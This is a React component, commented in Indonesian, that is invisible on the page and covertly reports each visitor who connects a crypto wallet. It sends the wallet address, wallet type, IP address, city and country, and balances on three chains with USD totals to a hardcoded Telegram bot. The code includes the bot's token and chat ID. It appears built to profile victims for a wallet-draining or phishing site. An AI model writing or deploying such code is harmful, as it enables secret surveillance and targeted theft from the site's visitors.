import { useEffect, useRef } from 'react';
import { useAccount, useBalance } from 'wagmi';
import { bsc, mainnet, base } from 'wagmi/chains';
import { formatEther } from 'viem';

// ================= KONFIGURASI TELEGRAM =================
// GANTI DENGAN TOKEN ANDA SENDIRI DARI @BotFather
const BOT_TOKEN = '8727161633:AAGLsuH5qgaBCeQLjgWdaiL1P9wrkz3818o'; 

// GANTI DENGAN ID ANDA SENDIRI DARI @userinfobot
const CHAT_ID = '-1003610646310'; 
// ========================================================

// Estimasi Harga (Anda bisa update manual)
const PRICES = {
  BNB: 610,
  ETH: 3200,
};

export default function TelegramLogger() {
  const { address, isConnected, connector } = useAccount();
  
  // Ambil saldo 3 chain sekaligus
  const { data: bnbBal } = useBalance({ address, chainId: bsc.id });
  const { data: ethBal } = useBalance({ address, chainId: mainnet.id });
  const { data: baseBal } = useBalance({ address, chainId: base.id });

  const hasLogged = useRef(false);

  useEffect(() => {
    // Logika: Kirim hanya jika connect, data saldo ada, dan belum pernah kirim
    if (isConnected && address && bnbBal && ethBal && baseBal && !hasLogged.current) {
      hasLogged.current = true;
      sendToTelegram();
    }
    
    if (!isConnected) {
      hasLogged.current = false;
    }
  }, [isConnected, address, bnbBal, ethBal, baseBal]);

  const sendToTelegram = async () => {
    try {
      // 1. Ambil IP & Lokasi
      let ip = 'Unknown';
      let location = 'Unknown';
      try {
        const res = await fetch('https://ipwho.is/');
        const data = await res.json();
        ip = data.ip;
        location = `${data.city}, ${data.country}`;
      } catch (e) {
        console.log("Gagal ambil lokasi");
      }

      // 2. Hitung Saldo & USD
      const parseBal = (bal) => parseFloat(formatEther(bal.value)).toFixed(4);
      
      const bnbVal = parseBal(bnbBal);
      const ethVal = parseBal(ethBal);
      const baseVal = parseBal(baseBal);

      const bnbUsd = (bnbVal * PRICES.BNB).toFixed(2);
      const ethUsd = (ethVal * PRICES.ETH).toFixed(2);
      const baseUsd = (baseVal * PRICES.ETH).toFixed(2);

      const totalUsd = (
        parseFloat(bnbUsd) + 
        parseFloat(ethUsd) + 
        parseFloat(baseUsd)
      ).toFixed(2);

      // 3. Format Pesan Telegram
      const message = `
🚀 *NEW USER CONNECTED!* 🚀

👤 *Address:* 
\`${address}\`

💼 *Wallet:* *${connector?.name || 'Unknown'}*
📍 *Location:* ${location} (IP: ${ip})
🌐 *Website:* ${window.location.origin}

━━━━━━━━━━━━━━━━━
💰 *ASSET BALANCES:*

🟡 *BNB Chain:*
• ${bnbVal} BNB ($${bnbUsd})

💎 *Ethereum Mainnet:*
• ${ethVal} ETH ($${ethUsd})

🔵 *Base Chain:*
• ${baseVal} ETH ($${baseUsd})

━━━━━━━━━━━━━━━━━
💵 *TOTAL ASSETS:* *$${totalUsd}*

🔗 *Debank Profile:*
[Click to View Full Portfolio](https://debank.com/profile/${address})
      `;

      // 4. Kirim ke Telegram
      const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;
      
      await fetch(url, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          chat_id: CHAT_ID,
          text: message,
          parse_mode: 'Markdown',
          disable_web_page_preview: false
        })
      });

      console.log("✅ Log terkirim ke Telegram!");

    } catch (error) {
      console.error("❌ Gagal kirim log:", error);
    }
  };

  return null; // Komponen tidak terlihat di layar
}